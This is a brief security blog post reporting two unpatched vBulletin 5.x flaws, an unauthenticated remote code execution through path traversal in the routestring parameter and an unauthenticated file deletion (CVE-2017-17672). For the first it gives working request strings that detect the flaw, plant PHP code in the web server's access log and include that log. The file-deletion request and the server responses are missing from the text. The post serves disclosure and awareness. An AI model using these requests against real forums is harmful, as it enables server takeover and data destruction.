[PoC] Two critical vulnerabilities exist on vBulletin 5x
Recently, the security researcher from securiteam published the vulnerabilities details that affect to vBulletin 5x. Although, they tried to contact to vBulletin developer to fix but have no any answers. It means all website that is using vBulletin 5x is vulnerable.
vBulletin, also known as vB, is a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including Fortune 500 and Alexa Top 1M companies websites and forums. According to the latest W3Techs1 statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while version 3 and 5 divide the remaining percentage
- vBulletin routestring Unauthenticated Remote Code Execution
Proof of Concept
We can check if the server is vulnerable by sending the following GET request:/index.php?routestring=.\\If the response is:
The server is vulnerable.
If we want to inject a php code to any file on the server we can use the access.log for example:
/?LogINJ_START=<?php phpinfo();?>LogINJ_END
After that we can include access.log with our PHP code:
/index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log
You can read the vulnerability analysis here.
-
CVE-2017-17672 vBulletin cacheTemplates Unauthenticated Remote Arbitrary File Deletion
Proof of Concept
By sending the following POST request an unauthenticated attacker can delete files from the victims serverThe server then will respond with:
You can read the vulnerability analysis here.
